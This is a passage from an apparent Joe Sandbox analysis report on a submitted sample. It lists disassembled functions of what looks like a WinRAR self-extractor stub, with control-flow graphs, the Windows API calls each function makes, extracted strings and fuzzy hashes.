                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: H_prologItemTextWindow
                  • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                  • API String ID: 810644672-3472986185
                  • Opcode ID: 4beb8472cd16166f8a1609b1940b0147f5b3ca0cda6964a61fe2f218252265ba
                  • Instruction ID: 9bdd80a5b447a5987d90781ca473384e193ddb176fdb930ff82c1d45a6498dc0
                  • Opcode Fuzzy Hash: 4beb8472cd16166f8a1609b1940b0147f5b3ca0cda6964a61fe2f218252265ba
                  • Instruction Fuzzy Hash: 9C42C771D44258BEEB21DF609C4AFBE7F7CAB01755F000055FA05A61E2CBB88985FB62
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F400CF Relevance: 51.1, APIs: 22, Strings: 7, Instructions: 317libraryfileloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 257 f400cf-f400ee call f4e360 GetModuleHandleW 260 f40154-f403b2 257->260 261 f400f0-f40107 GetProcAddress 257->261 262 f40484-f404b3 GetModuleFileNameW call f3bc85 call f3fe56 260->262 263 f403b8-f403c3 call f570dd 260->263 264 f40121-f40131 GetProcAddress 261->264 265 f40109-f4011f 261->265 279 f404b5-f404bf call f3acf5 262->279 263->262 274 f403c9-f403fa GetModuleFileNameW CreateFileW 263->274 264->260 268 f40133-f40152 264->268 265->264 268->260 276 f403fc-f4040a SetFilePointer 274->276 277 f40478-f4047f CloseHandle 274->277 276->277 280 f4040c-f40429 ReadFile 276->280 277->262 286 f404c1-f404c5 call f40085 279->286 287 f404cc 279->287 280->277 282 f4042b-f40450 280->282 284 f4046d-f40476 call f3fbd8 282->284 284->277 293 f40452-f4046c call f40085 284->293 294 f404ca 286->294 290 f404ce-f404d0 287->290 291 f404f2-f40518 call f3bcfb GetFileAttributesW 290->291 292 f404d2-f404f0 CompareStringW 290->292 295 f4051a-f4051e 291->295 301 f40522 291->301 292->291 292->295 293->284 294->290 295->279 299 f40520 295->299 302 f40526-f40528 299->302 301->302 303 f40560-f40562 302->303 304 f4052a 302->304 305 f4066f-f40679 303->305 306 f40568-f4057f call f3bccf call f3acf5 303->306 307 f4052c-f40552 call f3bcfb GetFileAttributesW 304->307 317 f405e7-f4061a call f3400a AllocConsole 306->317 318 f40581-f405e2 call f40085 * 2 call f3ddd1 call f3400a call f3ddd1 call f49f35 306->318 313 f40554-f40558 307->313 314 f4055c 307->314 313->307 316 f4055a 313->316 314->303 316->303 323 f40667-f40669 ExitProcess 317->323 324 f4061c-f40661 GetCurrentProcessId AttachConsole call f535b3 GetStdHandle WriteConsoleW Sleep FreeConsole 317->324 318->323 324->323
                  APIs
                  • GetModuleHandleW.KERNEL32(kernel32), ref: 00F400E4
                  • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00F400F6
                  • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00F40127
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00F403D4
                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F403F0
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00F40402
                  • ReadFile.KERNEL32(00000000,?,00007FFE,00F63BA4,00000000), ref: 00F40421
                  • CloseHandle.KERNEL32(00000000), ref: 00F40479
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00F4048F
                  • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 00F404E7
                  • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00F40510
                  • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 00F4054A
                    • Part of subcall function 00F40085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00F400A0
                    • Part of subcall function 00F40085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00F3EB86,Crypt32.dll,00000000,00F3EC0A,?,?,00F3EBEC,?,?,?), ref: 00F400C2
                  • _swprintf.LIBCMT ref: 00F405BE
                  • _swprintf.LIBCMT ref: 00F4060A
                    • Part of subcall function 00F3400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F3401D
                  • AllocConsole.KERNEL32 ref: 00F40612
                  • GetCurrentProcessId.KERNEL32 ref: 00F4061C
                  • AttachConsole.KERNEL32(00000000), ref: 00F40623
                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00F40649
                  • WriteConsoleW.KERNEL32(00000000), ref: 00F40650
                  • Sleep.KERNEL32(00002710), ref: 00F4065B
                  • FreeConsole.KERNEL32 ref: 00F40661
                  • ExitProcess.KERNEL32 ref: 00F40669
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                  • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                  • API String ID: 1201351596-3298887752
                  • Opcode ID: 0e45c756a55ece011a4bad610a39f4a644baddbedfaebad9c7e4f89615c19b35
                  • Instruction ID: d79afa1e3bac137e8388006e62e7901cfc719583bc488fb4fe815a3da9b49746
                  • Opcode Fuzzy Hash: 0e45c756a55ece011a4bad610a39f4a644baddbedfaebad9c7e4f89615c19b35
                  • Instruction Fuzzy Hash: 67D18FB1508384ABD330EF50DC49B9FBBE8EB85714F00091DF69996252DBB4964CAF63
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4BDF5 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 429windowCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 406 f4bdf5-f4be0d call f4e28c call f4e360 411 f4ca90-f4ca9d 406->411 412 f4be13-f4be3d call f4aa36 406->412 412->411 415 f4be43-f4be48 412->415 416 f4be49-f4be57 415->416 417 f4be58-f4be6d call f4a6c7 416->417 420 f4be6f 417->420 421 f4be71-f4be86 call f417ac 420->421 424 f4be93-f4be96 421->424 425 f4be88-f4be8c 421->425 426 f4ca5c-f4ca87 call f4aa36 424->426 427 f4be9c 424->427 425->421 428 f4be8e 425->428 426->416 443 f4ca8d-f4ca8f 426->443 429 f4c074-f4c076 427->429 430 f4c115-f4c117 427->430 431 f4c132-f4c134 427->431 432 f4bea3-f4bea6 427->432 428->426 429->426 435 f4c07c-f4c088 429->435 430->426 438 f4c11d-f4c12d SetWindowTextW 430->438 431->426 434 f4c13a-f4c141 431->434 432->426 436 f4beac-f4bf06 call f49da4 call f3b965 call f3a49d call f3a5d7 call f370bf 432->436 434->426 439 f4c147-f4c160 434->439 440 f4c09c-f4c0a1 435->440 441 f4c08a-f4c09b call f57168 435->441 497 f4c045-f4c05a call f3a52a 436->497 438->426 444 f4c162 439->444 445 f4c168-f4c176 call f535b3 439->445 448 f4c0a3-f4c0a9 440->448 449 f4c0ab-f4c0b6 call f4ab9a 440->449 441->440 443->411 444->445 445->426 461 f4c17c-f4c185 445->461 453 f4c0bb-f4c0bd 448->453 449->453 458 f4c0bf-f4c0c6 call f535b3 453->458 459 f4c0c8-f4c0e8 call f535b3 call f535de 453->459 458->459 480 f4c101-f4c103 459->480 481 f4c0ea-f4c0f1 459->481 465 f4c187-f4c18b 461->465 466 f4c1ae-f4c1b1 461->466 465->466 470 f4c18d-f4c195 465->470 472 f4c296-f4c2a4 call f3fe56 466->472 473 f4c1b7-f4c1ba 466->473 470->426 476 f4c19b-f4c1a9 call f3fe56 470->476 489 f4c2a6-f4c2ba call f517cb 472->489 478 f4c1c7-f4c1e2 473->478 479 f4c1bc-f4c1c1 473->479 476->489 492 f4c1e4-f4c21e 478->492 493 f4c22c-f4c233 478->493 479->472 479->478 480->426 488 f4c109-f4c110 call f535ce 480->488 486 f4c0f3-f4c0f5 481->486 487 f4c0f8-f4c100 call f57168 481->487 486->487 487->480 488->426 507 f4c2c7-f4c318 call f3fe56 call f4a8d0 GetDlgItem SetWindowTextW SendMessageW call f535e9 489->507 508 f4c2bc-f4c2c0 489->508 528 f4c220 492->528 529 f4c222-f4c224 492->529 499 f4c235-f4c24d call f535b3 493->499 500 f4c261-f4c284 call f535b3 * 2 493->500 514 f4c060-f4c06f call f3a4b3 497->514 515 f4bf0b-f4bf1f SetFileAttributesW 497->515 499->500 519 f4c24f-f4c25c call f3fe2e 499->519 500->489 533 f4c286-f4c294 call f3fe2e 500->533 540 f4c31d-f4c321 507->540 508->507 513 f4c2c2-f4c2c4 508->513 513->507 514->426 521 f4bfc5-f4bfd5 GetFileAttributesW 515->521 522 f4bf25-f4bf58 call f3b4f7 call f3b207 call f535b3 515->522 519->500 521->497 527 f4bfd7-f4bfe6 DeleteFileW 521->527 549 f4bf5a-f4bf69 call f535b3 522->549 550 f4bf6b-f4bf79 call f3b925 522->550 527->497 534 f4bfe8-f4bfeb 527->534 528->529 529->493 533->489 538 f4bfef-f4c01b call f3400a GetFileAttributesW 534->538 547 f4bfed-f4bfee 538->547 548 f4c01d-f4c033 MoveFileW 538->548 540->426 544 f4c327-f4c33b SendMessageW 540->544 544->426 547->538 548->497 551 f4c035-f4c03f MoveFileExW 548->551 549->550 556 f4bf7f-f4bfbe call f535b3 call f4f350 549->556 550->514 550->556 551->497 556->521
                  APIs
                  • __EH_prolog.LIBCMT ref: 00F4BDFA
                    • Part of subcall function 00F4AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00F4AAFE
                  • SetWindowTextW.USER32(?,?), ref: 00F4C127
                  • _wcsrchr.LIBVCRUNTIME ref: 00F4C2B1
                  • GetDlgItem.USER32(?,00000066), ref: 00F4C2EC
                  • SetWindowTextW.USER32(00000000,?), ref: 00F4C2FC
                  • SendMessageW.USER32(00000000,00000143,00000000,00F7A472), ref: 00F4C30A
                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00F4C335
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                  • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                  • API String ID: 3564274579-312220925
                  • Opcode ID: 6f2b8f2ad97bb91e7bd3e11e3f74769c447cde158f55f53560d4154fe7144c54
                  • Instruction ID: adc726169b41999b00121842fc70a9aa89abe1fc21439bbc9f5d9e4cf95486ff
                  • Opcode Fuzzy Hash: 6f2b8f2ad97bb91e7bd3e11e3f74769c447cde158f55f53560d4154fe7144c54
                  • Instruction Fuzzy Hash: 28E19772D0411DAADB25DBA4DC55DEF7B7CAF05311F005066FA09E3051EB749B88AB90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F3D341 Relevance: 23.3, APIs: 4, Strings: 9, Instructions: 555COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 561 f3d341-f3d378 call f4e28c call f4e360 call f515e8 568 f3d3ab-f3d3b4 call f3fe56 561->568 569 f3d37a-f3d3a9 GetModuleFileNameW call f3bc85 call f3fe2e 561->569 573 f3d3b9-f3d3dd call f39619 call f399b0 568->573 569->573 580 f3d3e3-f3d3eb 573->580 581 f3d7a0-f3d7a6 call f39653 573->581 583 f3d409-f3d438 call f55a90 * 2 580->583 584 f3d3ed-f3d405 call f43781 * 2 580->584 585 f3d7ab-f3d7bb 581->585 595 f3d43b-f3d43e 583->595 594 f3d407 584->594 594->583 596 f3d444-f3d44a call f39e40 595->596 597 f3d56c-f3d58f call f39d30 call f535d3 595->597 600 f3d44f-f3d476 call f39bf0 596->600 597->581 606 f3d595-f3d5b0 call f39bf0 597->606 607 f3d535-f3d538 600->607 608 f3d47c-f3d484 600->608 620 f3d5b2-f3d5b7 606->620 621 f3d5b9-f3d5cc call f535d3 606->621 612 f3d53b-f3d55d call f39d30 607->612 610 f3d486-f3d48e 608->610 611 f3d4af-f3d4ba 608->611 610->611 614 f3d490-f3d4aa call f55ec0 610->614 615 f3d4e5-f3d4ed 611->615 616 f3d4bc-f3d4c8 611->616 612->595 631 f3d563-f3d566 612->631 634 f3d52b-f3d533 614->634 635 f3d4ac 614->635 618 f3d519-f3d51d 615->618 619 f3d4ef-f3d4f7 615->619 616->615 623 f3d4ca-f3d4cf 616->623 618->607 626 f3d51f-f3d522 618->626 619->618 625 f3d4f9-f3d513 call f55ec0 619->625 627 f3d5f1-f3d5f8 620->627 621->581 641 f3d5d2-f3d5ee call f4137a call f535ce 621->641 623->615 630 f3d4d1-f3d4e3 call f55808 623->630 625->581 625->618 626->608 637 f3d5fa 627->637 638 f3d5fc-f3d625 call f3fdfb call f535d3 627->638 630->615 645 f3d527 630->645 631->581 631->597 634->612 635->611 637->638 650 f3d633-f3d649 638->650 651 f3d627-f3d62e call f535ce 638->651 641->627 645->634 654 f3d731-f3d757 call f3ce72 call f535ce * 2 650->654 655 f3d64f-f3d65d 650->655 651->581 690 f3d771-f3d79d call f55a90 * 2 654->690 691 f3d759-f3d76f call f43781 * 2 654->691 657 f3d664-f3d669 655->657 660 f3d66f-f3d678 657->660 661 f3d97c-f3d984 657->661 663 f3d684-f3d68b 660->663 664 f3d67a-f3d67e 660->664 665 f3d72b-f3d72e 661->665 666 f3d98a-f3d98e 661->666 670 f3d691-f3d6b6 663->670 671 f3d880-f3d891 call f3fcbf 663->671 664->661 664->663 665->654 667 f3d990-f3d996 666->667 668 f3d9de-f3d9e4 666->668 672 f3d722-f3d725 667->672 673 f3d99c-f3d9a3 667->673 676 f3d9e6-f3d9ec 668->676 677 f3da0a-f3da2a call f3ce72 668->677 678 f3d6b9-f3d6de call f535b3 call f55808 670->678 692 f3d897-f3d8c0 call f3fe56 call f55885 671->692 693 f3d976-f3d979 671->693 672->657 672->665 680 f3d9a5-f3d9a8 673->680 681 f3d9ca 673->681 676->677 685 f3d9ee-f3d9f4 676->685 696 f3da02-f3da05 677->696 709 f3d6e0-f3d6ea 678->709 710 f3d6f6 678->710 687 f3d9c6-f3d9c8 680->687 688 f3d9aa-f3d9ad 680->688 694 f3d9cc-f3d9d9 681->694 685->672 695 f3d9fa-f3da01 685->695 687->694 698 f3d9c2-f3d9c4 688->698 699 f3d9af-f3d9b2 688->699 690->581 691->690 692->693 721 f3d8c6-f3d93c call f41596 call f3fdfb call f3fdd4 call f3fdfb call f558d9 692->721 693->661 694->672 695->696 698->694 704 f3d9b4-f3d9b8 699->704 705 f3d9be-f3d9c0 699->705 704->685 711 f3d9ba-f3d9bc 704->711 705->694 709->710 715 f3d6ec-f3d6f4 709->715 716 f3d6f9-f3d6fd 710->716 711->694 715->716 716->678 720 f3d6ff-f3d706 716->720 722 f3d7be-f3d7c1 720->722 723 f3d70c-f3d71a call f3fdfb 720->723 754 f3d94a-f3d95f 721->754 755 f3d93e-f3d947 721->755 722->671 725 f3d7c7-f3d7ce 722->725 731 f3d71f 723->731 729 f3d7d0-f3d7d4 725->729 730 f3d7d6-f3d7d7 725->730 729->730 733 f3d7d9-f3d7e7 729->733 730->725 731->672 735 f3d7e9-f3d7ec 733->735 736 f3d808-f3d830 call f41596 733->736 738 f3d805 735->738 739 f3d7ee-f3d803 735->739 744 f3d853-f3d85b 736->744 745 f3d832-f3d84e call f535e9 736->745 738->736 739->735 739->738 746 f3d862-f3d87b call f3dd6b 744->746 747 f3d85d 744->747 745->731 746->731 747->746 756 f3d960-f3d967 754->756 755->754 757 f3d973-f3d974 756->757 758 f3d969-f3d96d 756->758 757->756 758->731 758->757
                  APIs
                  • __EH_prolog.LIBCMT ref: 00F3D346
                  • _wcschr.LIBVCRUNTIME ref: 00F3D367
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00F3D328,?), ref: 00F3D382
                  • __fprintf_l.LIBCMT ref: 00F3D873
                    • Part of subcall function 00F4137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00F3B652,00000000,?,?,?,00010428), ref: 00F41396
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                  • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                  • API String ID: 4184910265-980926923
                  • Opcode ID: 1c571f7d9628d9d7ce0b3d5efae9bca5a666d64ee57897a94299e052bfb848d8
                  • Instruction ID: b7894a7565527d7767432b1c590a2bc5106194a11ebbcc7bc4a174385bd9ed86
                  • Opcode Fuzzy Hash: 1c571f7d9628d9d7ce0b3d5efae9bca5a666d64ee57897a94299e052bfb848d8
                  • Instruction Fuzzy Hash: 9E12D4B1D002199ADF24DFA4EC81BEEB7B5FF04720F144569F605B7282EB749A44EB60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4CB5A Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00F4AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00F4AC85
                    • Part of subcall function 00F4AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F4AC96
                    • Part of subcall function 00F4AC74: IsDialogMessageW.USER32(00010428,?), ref: 00F4ACAA
                    • Part of subcall function 00F4AC74: TranslateMessage.USER32(?), ref: 00F4ACB8
                    • Part of subcall function 00F4AC74: DispatchMessageW.USER32(?), ref: 00F4ACC2
                  • GetDlgItem.USER32(00000068,00F8ECB0), ref: 00F4CB6E
                  • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,00F4A632,00000001,?,?,00F4AECB,00F64F88,00F8ECB0), ref: 00F4CB96
                  • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00F4CBA1
                  • SendMessageW.USER32(00000000,000000C2,00000000,00F635B4), ref: 00F4CBAF
                  • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00F4CBC5
                  • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00F4CBDF
                  • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00F4CC23
                  • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00F4CC31
                  • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00F4CC40
                  • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00F4CC67
                  • SendMessageW.USER32(00000000,000000C2,00000000,00F6431C), ref: 00F4CC76
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                  • String ID: \
                  • API String ID: 3569833718-2967466578
                  • Opcode ID: f15667f0d4a80730e69cc7db32dee4797ca3ef6aac9bc59f6308b8d50e7c4608
                  • Instruction ID: c238f24df9312ff0d8e686f82bf12136b356bb2bb9ec8ad315dcf7658040589d
                  • Opcode Fuzzy Hash: f15667f0d4a80730e69cc7db32dee4797ca3ef6aac9bc59f6308b8d50e7c4608
                  • Instruction Fuzzy Hash: 8931F37118934ABFD301DF21DC4AFAB7FACEB82754F000509FA51961A1DB644A05EBB7
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4CE22 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 796 f4ce22-f4ce3a call f4e360 799 f4ce40-f4ce4c call f535b3 796->799 800 f4d08b-f4d093 796->800 799->800 803 f4ce52-f4ce7a call f4f350 799->803 806 f4ce84-f4ce91 803->806 807 f4ce7c 803->807 808 f4ce95-f4ce9e 806->808 809 f4ce93 806->809 807->806 810 f4ced6 808->810 811 f4cea0-f4cea2 808->811 809->808 813 f4ceda-f4cedd 810->813 812 f4ceaa-f4cead 811->812 814 f4ceb3-f4cebb 812->814 815 f4d03c-f4d041 812->815 816 f4cee4-f4cee6 813->816 817 f4cedf-f4cee2 813->817 818 f4d055-f4d05d 814->818 819 f4cec1-f4cec7 814->819 820 f4d036-f4d03a 815->820 821 f4d043 815->821 822 f4cef9-f4cf0e call f3b493 816->822 823 f4cee8-f4ceef 816->823 817->816 817->822 826 f4d065-f4d06d 818->826 827 f4d05f-f4d061 818->827 819->818 824 f4cecd-f4ced4 819->824 820->815 825 f4d048-f4d04c 820->825 821->825 831 f4cf27-f4cf32 call f3a180 822->831 832 f4cf10-f4cf1d call f417ac 822->832 823->822 828 f4cef1 823->828 824->810 824->812 825->818 826->813 827->826 828->822 838 f4cf34-f4cf4b call f3b239 831->838 839 f4cf4f-f4cf5c ShellExecuteExW 831->839 832->831 837 f4cf1f 832->837 837->831 838->839 841 f4cf62-f4cf6f 839->841 842 f4d08a 839->842 844 f4cf71-f4cf78 841->844 845 f4cf82-f4cf84 841->845 842->800 844->845 846 f4cf7a-f4cf80 844->846 847 f4cf86-f4cf8f 845->847 848 f4cf9b-f4cfba call f4d2e6 845->848 846->845 849 f4cff1-f4cffd CloseHandle 846->849 847->848 858 f4cf91-f4cf99 ShowWindow 847->858 848->849 864 f4cfbc-f4cfc4 848->864 851 f4d00e-f4d01c 849->851 852 f4cfff-f4d00c call f417ac 849->852 856 f4d01e-f4d020 851->856 857 f4d079-f4d07b 851->857 852->851 865 f4d072 852->865 856->857 859 f4d022-f4d028 856->859 857->842 862 f4d07d-f4d07f 857->862 858->848 859->857 863 f4d02a-f4d034 859->863 862->842 866 f4d081-f4d084 ShowWindow 862->866 863->857 864->849 867 f4cfc6-f4cfd7 GetExitCodeProcess 864->867 865->857 866->842 867->849 868 f4cfd9-f4cfe3 867->868 869 f4cfe5 868->869 870 f4cfea 868->870 869->870 870->849
                  APIs
                  • ShellExecuteExW.SHELL32(?), ref: 00F4CF54
                  • ShowWindow.USER32(?,00000000), ref: 00F4CF93
                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00F4CFCF
                  • CloseHandle.KERNEL32(?), ref: 00F4CFF5
                  • ShowWindow.USER32(?,00000001), ref: 00F4D084
                    • Part of subcall function 00F417AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00F3BB05,00000000,.exe,?,?,00000800,?,?,00F485DF,?), ref: 00F417C2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                  • String ID: $.exe$.inf
                  • API String ID: 3686203788-2452507128
                  • Opcode ID: 1e742844db8a40c0b2776eab5f34bfd5c53702afece60551bea217a07cc41040
                  • Instruction ID: ecffedd92a3ed09995c38dc77475f9b28dcf341873711d8df5eb787f79dc89b1
                  • Opcode Fuzzy Hash: 1e742844db8a40c0b2776eab5f34bfd5c53702afece60551bea217a07cc41040
                  • Instruction Fuzzy Hash: 2D611570C05380AAD731DF24D8146AB7FE5AF82324F04581EFDC497254E7B58989FBA2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F5A058 Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 871 f5a058-f5a071 872 f5a087-f5a08c 871->872 873 f5a073-f5a083 call f5e6ed 871->873 875 f5a08e-f5a096 872->875 876 f5a099-f5a0bd MultiByteToWideChar 872->876 873->872 880 f5a085 873->880 875->876 878 f5a250-f5a263 call f4ec4a 876->878 879 f5a0c3-f5a0cf 876->879 881 f5a0d1-f5a0e2 879->881 882 f5a123 879->882 880->872 886 f5a0e4-f5a0f3 call f61a30 881->886 887 f5a101-f5a112 call f58518 881->887 885 f5a125-f5a127 882->885 889 f5a245 885->889 890 f5a12d-f5a140 MultiByteToWideChar 885->890 886->889 896 f5a0f9-f5a0ff 886->896 887->889 897 f5a118 887->897 895 f5a247-f5a24e call f5a2c0 889->895 890->889 894 f5a146-f5a158 call f5a72c 890->894 901 f5a15d-f5a161 894->901 895->878 900 f5a11e-f5a121 896->900 897->900 900->885 901->889 903 f5a167-f5a16e 901->903 904 f5a170-f5a175 903->904 905 f5a1a8-f5a1b4 903->905 904->895 908 f5a17b-f5a17d 904->908 906 f5a1b6-f5a1c7 905->906 907 f5a200 905->907 911 f5a1e2-f5a1f3 call f58518 906->911 912 f5a1c9-f5a1d8 call f61a30 906->912 909 f5a202-f5a204 907->909 908->889 910 f5a183-f5a19d call f5a72c 908->910 913 f5a206-f5a21f call f5a72c 909->913 914 f5a23e-f5a244 call f5a2c0 909->914 910->895 924 f5a1a3 910->924 911->914 